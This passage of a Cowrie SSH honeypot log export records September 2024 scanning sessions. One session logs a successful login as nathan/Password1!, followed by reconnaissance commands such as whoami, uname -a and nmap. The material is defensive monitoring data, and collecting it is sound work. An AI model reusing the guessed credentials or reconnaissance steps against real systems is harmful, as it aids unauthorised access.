af493dba7b79f250d4e61f2d2a34c8da"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:43.853368Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" 
+"9/20/2024, 2:23:51.841 PM",,"{""eventid"":""cowrie.login.success"",""username"":""nathan"",""password"":""Password1!"",""message"":""login attempt [nathan/Password1!] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:51.840370Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:51.875 PM",,"{""eventid"":""cowrie.client.size"",""width"":236,""height"":13,""message"":""Terminal Size: 236 13"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:51.874542Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:51.878 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:51.876828Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:54.303 PM",,"{""eventid"":""cowrie.command.input"",""input"":""ls"",""message"":""CMD: ls"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:54.302140Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:56.716 PM",,"{""eventid"":""cowrie.command.input"",""input"":""whoami"",""message"":""CMD: 
whoami"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:56.714933Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:02.711 PM",,"{""eventid"":""cowrie.command.input"",""input"":""uname -a"",""message"":""CMD: uname -a"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:02.710709Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:29.339 PM",,"{""eventid"":""cowrie.command.input"",""input"":""scp"",""message"":""CMD: scp"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:29.338128Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:38.534 PM",,"{""eventid"":""cowrie.command.input"",""input"":""scp -help"",""message"":""CMD: scp -help"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:38.533475Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:47.287 PM",,"{""eventid"":""cowrie.command.input"",""input"":""nmap"",""message"":""CMD: nmap"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:47.286546Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:47.289 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""nmap"",""message"":""Command not found: nmap"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:47.288478Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:13.120 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""157.230.106.97"",""src_port"":28613,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""e02f9dfa15a7"",""protocol"":""ssh"",""message"":""New connection: 157.230.106.97:28613 (10.0.0.4:2222) [session: e02f9dfa15a7]"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:13.119489Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:13.129 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.007738351821899414,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:13.128576Z"",""src_ip"":""157.230.106.97"",""session"":""e02f9dfa15a7""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:16.490 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""157.230.106.97"",""src_port"":2679,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""19053fcc6859"",""protocol"":""ssh"",""message"":""New connection: 157.230.106.97:2679 (10.0.0.4:2222) [session: 
19053fcc6859]"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:16.489410Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:16.578 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.08674335479736328,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:16.577544Z"",""src_ip"":""157.230.106.97"",""session"":""19053fcc6859""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:19.198 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""167.71.62.129"",""src_port"":45752,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""23ad8a7a2213"",""protocol"":""ssh"",""message"":""New connection: 167.71.62.129:45752 (10.0.0.4:2222) [session: 23ad8a7a2213]"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:19.196980Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:19.199 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:19.198487Z"",""src_ip"":""167.71.62.129"",""session"":""23ad8a7a2213""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:19.287 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""2aec6b44b06bec95d73f66b5d30cb69a"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:19.285187Z"",""src_ip"":""167.71.62.129"",""session"":""23ad8a7a2213""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:39.199 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":19.99979567527771,""message"":""Connection lost after 19 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:39.198186Z"",""src_ip"":""167.71.62.129"",""session"":""23ad8a7a2213""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:34:05.794 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""199.45.155.95"",""src_port"":35340,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""a0c645f0ded0"",""protocol"":""ssh"",""message"":""New connection: 199.45.155.95:35340 (10.0.0.4:2222) [session: a0c645f0ded0]"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:34:05.793313Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:34:06.616 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:34:06.615812Z"",""src_ip"":""199.45.155.95"",""session"":""a0c645f0ded0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:34:06.620 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""873a5fb5fedc2d4f8638ebde4abc6cfc"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""diffie-hellman-group-exchange-sha256""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-cbc"",""3des-cbc""],""macCS"
":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:34:06.617207Z"",""src_ip"":""199.45.155.95"",""session"":""a0c645f0ded0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:34:21.748 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":15.952751874923706,""message"":""Connection lost after 15 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:34:21.747492Z"",""src_ip"":""199.45.155.95"",""session"":""a0c645f0ded0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:45:31.258 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""205.210.31.74"",""src_port"":52588,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1cef22654fde"",""protocol"":""ssh"",""message"":""New connection: 205.210.31.74:52588 (10.0.0.4:2222) [session: 1cef22654fde]"",""sensor"":""server01"",""timestamp"":""2024-09-20T18:45:31.257598Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:45:31.419 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.15976452827453613,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T18:45:31.418754Z"",""src_ip"":""205.210.31.74"",""session"":""1cef22654fde""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:08:01.716 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""199.45.154.147"",""src_port"":43414,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""0f96692fad07"",""protocol"":""ssh"",""message"":""New connection: 199.45.154.147:43414 (10.0.0.4:2222) [session: 0f96692fad07]"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:08:01.715304Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:08:01.939 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:08:01.939023Z"",""src_ip"":""199.45.154.147"",""session"":""0f96692fad07""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:08:02.286 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""873a5fb5fedc2d4f8638ebde4abc6cfc"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""diffie-hellman-group-exchange-sha256""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-cbc"",""3des-cbc""],""macCS"
":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:08:02.283228Z"",""src_ip"":""199.45.154.147"",""session"":""0f96692fad07""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:08:17.640 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":15.57369875907898,""message"":""Connection lost after 15 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:08:17.290297Z"",""src_ip"":""199.45.154.147"",""session"":""0f96692fad07""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:04:01.305 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""38.88.252.187"",""src_port"":46887,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""92be41800a3a"",""protocol"":""ssh"",""message"":""New connection: 38.88.252.187:46887 (10.0.0.4:2222) [session: 92be41800a3a]"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:04:01.304535Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:04:01.382 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.07588720321655273,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:04:01.381764Z"",""src_ip"":""38.88.252.187"",""session"":""92be41800a3a""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:26.467 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""36.138.164.147"",""src_port"":41586,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""69cf13a1fcde"",""protocol"":""ssh"",""message"":""New connection: 36.138.164.147:41586 (10.0.0.4:2222) [session: 69cf13a1fcde]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:26.465979Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:26.700 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.23193883895874023,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:26.699192Z"",""src_ip"":""36.138.164.147"",""session"":""69cf13a1fcde""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:26.975 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""36.138.164.147"",""src_port"":41780,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""b771cfe769f5"",""protocol"":""ssh"",""message"":""New connection: 36.138.164.147:41780 (10.0.0.4:2222) [session: b771cfe769f5]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:26.974053Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:30.751 
AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""36.138.164.147"",""src_port"":42246,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""30c7b7ed5b26"",""protocol"":""ssh"",""message"":""New connection: 36.138.164.147:42246 (10.0.0.4:2222) [session: 30c7b7ed5b26]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:30.749639Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:30.980 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.2280747890472412,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:30.979461Z"",""src_ip"":""36.138.164.147"",""session"":""30c7b7ed5b26""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:31.218 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""36.138.164.147"",""src_port"":42526,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9a68e84f7827"",""protocol"":""ssh"",""message"":""New connection: 36.138.164.147:42526 (10.0.0.4:2222) [session: 9a68e84f7827]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:31.217090Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:26:55.860 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""198.235.24.158"",""src_port"":57962,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""79e745d1bcb3"",""protocol"":""ssh"",""message"":""New connection: 198.235.24.158:57962 (10.0.0.4:2222) [session: 79e745d1bcb3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:26:55.859356Z""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:26:56.750 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:26:56.749760Z"",""src_ip"":""198.235.24.158"",""session"":""79e745d1bcb3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:26:57.500 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""